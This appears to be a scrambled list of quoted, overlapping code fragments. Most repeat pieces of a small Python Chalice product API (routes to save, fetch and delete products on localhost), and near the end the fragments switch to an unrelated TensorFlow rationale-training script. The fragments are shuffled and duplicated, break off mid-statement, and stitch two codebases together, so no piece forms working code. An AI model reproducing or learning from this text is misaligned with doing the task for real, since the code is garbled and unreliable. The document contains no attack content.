localhost:8000 @app.route('/') def index(): return {'hello':", "import requests from chalice import Chalice from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls,", "http localhost:8000 @app.route('/') def index(): return {'hello': 'world!'} # http POST localhost:8000/products #", "not found!\", \"productData\": None } if 'URL' in payload: try: product_data = requests.get(payload[\"URL\"]).json()", "None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\", \"productData\":", "index(): return {'hello': 'world!'} # http POST localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\"", "{ \"message\": \"Success!\", \"productData\": product_data } except:#if not int return {\"message\": \"Missing ID!\",", "localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None} # http", "return { \"message\": str(e), \"productData\": None } return { \"message\": \"Success!\", \"productData\": product_data", "return { \"message\": \"URL not found!\", \"productData\": None } if 'URL' in payload:", "\"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\":", "localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" #", "\"URL not found!\", \"productData\": None } if 'URL' in payload: try: product_data =", "found!\", \"productData\": None } if 'URL' in payload: try: product_data = requests.get(payload[\"URL\"]).json() except:", "\"Success!\", \"productData\": product_data } # http 
localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data", "POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ #", "return { \"message\": \"Success!\", \"productData\": product_data } except:#if not int return {\"message\": \"Missing", "URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ]", "\"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct(): payload = app.current_request.json_body if not payload:", "product schema!\", \"productData\": None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] =", "{ \"message\": \"Success!\", \"productData\": product_data } # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId):", "= getProductDataByID(productId) if not product_data: return {\"message\": \"Product not found!\"} return { \"message\":", "\"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct(): payload = app.current_request.json_body if", "product_data = getProductDataByID(productId) if not product_data: return {\"message\": \"Product not found!\"} return {", "app = Chalice(app_name='api-intent') # All commented lines are for debugging # app.debug =", "product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\", \"productData\": 
None } #product_data", "'world!'} # http POST localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST", "product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception", "{\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\", \"productData\": None", "# http localhost:8000 @app.route('/') def index(): return {'hello': 'world!'} # http POST localhost:8000/products", "deleteProductDataByID ) app = Chalice(app_name='api-intent') # All commented lines are for debugging #", "ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing", "except:#if not int return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products',", "URL!\", \"productData\": None } #product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return {", "# http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product deleted!\"}", "e: return { \"message\": str(e), \"productData\": None } return { \"message\": \"Success!\", \"productData\":", "import Chalice from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID )", "http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None} #", "requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\", \"productData\": None } 
#product_data = {\"bad\":", "http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [", "= uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e: return {", "cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e:", "getProductDataByID(productId) if not product_data: return {\"message\": \"Product not found!\"} return { \"message\": \"Success!\",", "def index(): return {'hello': 'world!'} # http POST localhost:8000/products # http POST localhost:8000/products", "if not payload: return { \"message\": \"URL not found!\", \"productData\": None } if", "\"message\": str(e), \"productData\": None } return { \"message\": \"Success!\", \"productData\": product_data } #", "\"message\": \"URL not found!\", \"productData\": None } if 'URL' in payload: try: product_data", "'URL' in payload: try: product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\",", "productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') # All commented", "app.debug = False # http localhost:8000 @app.route('/') def index(): return {'hello': 'world!'} #", "saveProduct(): payload = app.current_request.json_body if not payload: return { \"message\": \"URL not found!\",", "] @app.route('/products', methods=['POST']) def saveProduct(): payload = app.current_request.json_body if not payload: return {", "# http POST localhost:8000/products # http POST 
localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products", "Exception as e: return { \"message\": str(e), \"productData\": None } return { \"message\":", "\"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\",", "\"message\": \"Invalid product schema!\", \"productData\": None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"])", "localhost:8000 @app.route('/') def index(): return {'hello': 'world!'} # http POST localhost:8000/products # http", "# \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct(): payload = app.current_request.json_body", "\"Missing ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\":", "methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product deleted!\"} except: return {\"message\": \"Missing", "cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') # All commented lines", "payload: try: product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\", \"productData\": None", "methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId) if not product_data: return {\"message\": \"Product", "try: product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\", \"productData\": None }", "not payload: return { \"message\": \"URL not found!\", \"productData\": None } if 'URL'", "payload: return { \"message\": \"URL not found!\", \"productData\": None } if 'URL' in", "commented lines are for 
debugging # app.debug = False # http localhost:8000 @app.route('/')", "} if 'URL' in payload: try: product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\":", "productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\", \"productData\": None } product_data = cleanProductData(product_data)", "\"message\": \"Invalid URL!\", \"productData\": None } #product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data):", "methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete',", "#product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e: return { \"message\": str(e),", "def saveProduct(): payload = app.current_request.json_body if not payload: return { \"message\": \"URL not", "http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", #", "from chalice import Chalice from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID,", "for debugging # app.debug = False # http localhost:8000 @app.route('/') def index(): return", "\"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId)", "{ \"message\": \"Invalid URL!\", \"productData\": None } #product_data = {\"bad\": \"productData\"} if not", "return { \"message\": \"Invalid URL!\", \"productData\": None } #product_data = {\"bad\": \"productData\"} if", "\"message\": \"Success!\", \"productData\": product_data } # http localhost:8000/products/42 
@app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try:", "\"Invalid product schema!\", \"productData\": None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"]", "except: return { \"message\": \"Invalid URL!\", \"productData\": None } #product_data = {\"bad\": \"productData\"}", "} #product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return { \"message\": \"Invalid product", "product_data: return {\"message\": \"Product not found!\"} return { \"message\": \"Success!\", \"productData\": product_data }", "= False # http localhost:8000 @app.route('/') def index(): return {'hello': 'world!'} # http", "{\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return", "\"productData\": product_data } # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data =", "image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST'])", "methods=['POST']) def saveProduct(): payload = app.current_request.json_body if not payload: return { \"message\": \"URL", "requests from chalice import Chalice from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData,", "failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def", "{\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try:", "{\"message\": 
\"Product not found!\"} return { \"message\": \"Success!\", \"productData\": product_data } except:#if not", "@app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete", "Chalice(app_name='api-intent') # All commented lines are for debugging # app.debug = False #", "{ \"message\": str(e), \"productData\": None } return { \"message\": \"Success!\", \"productData\": product_data }", "[ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct():", "product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e: return", "return { \"message\": \"Invalid product schema!\", \"productData\": None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"]", "} # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId) if", "return {'hello': 'world!'} # http POST localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\" #", "if not product_data: return {\"message\": \"Product not found!\"} return { \"message\": \"Success!\", \"productData\":", "None } return { \"message\": \"Success!\", \"productData\": product_data } # http localhost:8000/products/42 @app.route('/products/{productId}',", "are for debugging # app.debug = False # http localhost:8000 @app.route('/') def index():", "= requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\", \"productData\": None } #product_data =", "None } if 'URL' in payload: try: product_data = 
requests.get(payload[\"URL\"]).json() except: return {", "#product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\",", "POST localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" #", "from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app =", "localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list", "# image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products',", "import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') #", "uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e: return { \"message\": str(e), \"productData\": None", "def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product deleted!\"} except: return {\"message\": \"Missing ID!\"}", "uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') # All commented lines are", "not product_data: return {\"message\": \"Product not found!\"} return { \"message\": \"Success!\", \"productData\": product_data", "return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct():", "except Exception as e: return { 
\"message\": str(e), \"productData\": None } return {", "= {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\", \"productData\":", "# \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct(): payload", "# app.debug = False # http localhost:8000 @app.route('/') def index(): return {'hello': 'world!'}", "not int return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET'])", "found!\"} return { \"message\": \"Success!\", \"productData\": product_data } except:#if not int return {\"message\":", "lines are for debugging # app.debug = False # http localhost:8000 @app.route('/') def", "Chalice from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app", "return { \"message\": \"Success!\", \"productData\": product_data } # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def", "@app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId) if not product_data: return {\"message\":", "= app.current_request.json_body if not payload: return { \"message\": \"URL not found!\", \"productData\": None", "getProduct(productId): try: product_data = getProductDataByID(productId) if not product_data: return {\"message\": \"Product not found!\"}", "POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\"", "\"productData\": None } product_data = cleanProductData(product_data) 
product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try:", "product_data } except:#if not int return {\"message\": \"Missing ID!\", \"productData\": None} # http", "product_data } # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId)", "ID!\", \"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return", "schema!\", \"productData\": None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list)", "False # http localhost:8000 @app.route('/') def index(): return {'hello': 'world!'} # http POST", "# All commented lines are for debugging # app.debug = False # http", "uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e: return { \"message\":", "\"productData\": None } #product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return { \"message\":", "= [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def", "= uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as e: return { \"message\": str(e), \"productData\":", "} except:#if not int return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/", "{ \"message\": \"Invalid product schema!\", \"productData\": None } 
product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] =", "http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId) if not product_data:", "def failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET'])", "http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product deleted!\"} except:", "\"productData\": None } return { \"message\": \"Success!\", \"productData\": product_data } # http localhost:8000/products/42", "http POST localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\"", "not found!\"} return { \"message\": \"Success!\", \"productData\": product_data } except:#if not int return", "} product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except", "if not productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\", \"productData\": None } product_data", "localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId) if not product_data: return", "All commented lines are for debugging # app.debug = False # http localhost:8000", "return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/42/delete 
@app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId):", ") app = Chalice(app_name='api-intent') # All commented lines are for debugging # app.debug", "# http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\",", "<gh_stars>1-10 import requests from chalice import Chalice from chalicelib import ( productSchemaIsValid, cleanProductData,", "\"productData\"} if not productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\", \"productData\": None }", "\"https://softgata.com/assets/django.png\", # \"https://softgata.com/assets/fastapi.svg\", # \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct(): payload =", "not productSchemaIsValid(product_data): return { \"message\": \"Invalid product schema!\", \"productData\": None } product_data =", "int return {\"message\": \"Missing ID!\", \"productData\": None} # http localhost:8000/products/ @app.route('/products', methods=['GET']) def", "\"Success!\", \"productData\": product_data } except:#if not int return {\"message\": \"Missing ID!\", \"productData\": None}", "chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent')" ]
[ "class Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self, message): self.speak_dialog('midicontrol') def create_skill(): return", "mycroft import MycroftSkill, intent_file_handler class Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self, message):", "from mycroft import MycroftSkill, intent_file_handler class Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self,", "Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self, message): self.speak_dialog('midicontrol') def create_skill(): return Midicontrol()", "import MycroftSkill, intent_file_handler class Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self, message): self.speak_dialog('midicontrol')", "MycroftSkill, intent_file_handler class Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self, message): self.speak_dialog('midicontrol') def", "intent_file_handler class Midicontrol(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('midicontrol.intent') def handle_midicontrol(self, message): self.speak_dialog('midicontrol') def create_skill():" ]
[ "[y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run {} : {}\".format(counter, val_loss))", "few-shot learning. This code base is adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections", "batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred =", "type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp =", "y_train[:,0] y_val = acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:]", "< len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number of instances sampled from {}", "logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier':", "create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count)", "np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint'", "y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best", "rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if", "cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length,", 
"tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss", "logger.info('Number of devices: {}'.format(gpus)) #run the base model n times with different initialization", "[y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0],", "acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs = y_val[indices] probs_rat = y_rat[indices] cls =", "indx[:unsup_size] logger.info(\"Shape of predicted labels for class {} : {}\".format(i, len(indx))) indices.extend(indx) indices", "logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher model for", "logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred,", "rationales on test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on", "'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':", "model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): 
model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file))", "class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0, 1] #fix hardcoding labels =", "= [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc =", "1:] #y_pred = y_pred[:,1:] # sample from unlabeled set if 'uni' in sample_scheme:", "axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc,", "import random from sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale')", "model best_validation_loss = val_loss[0] model = best_base_model ''' if 'mtl' in type_: logger.info", "< best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc >", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in", "def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count: res =", "= acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else: out", "i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if", "= {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_:", "on test set (teacher model): {} 
\".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test", "pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p: if word in temp_t: ct+=1", "None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model", "# sample from unlabeled set if 'uni' in sample_scheme: logger.info (\"Sampling uniformly\") if", "shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight)", "= y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10)", "{} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (student model): {} \".format(score3/len(pred)))", "X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in", "axis=-1) elif 'joint' in type_: if 'pruthi_' in type_: out = y_train acc,", "validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg'", "with different initialization to select best base model based on validation loss best_base_model", "y_rat[indices] cls = list(acc[indices]) 
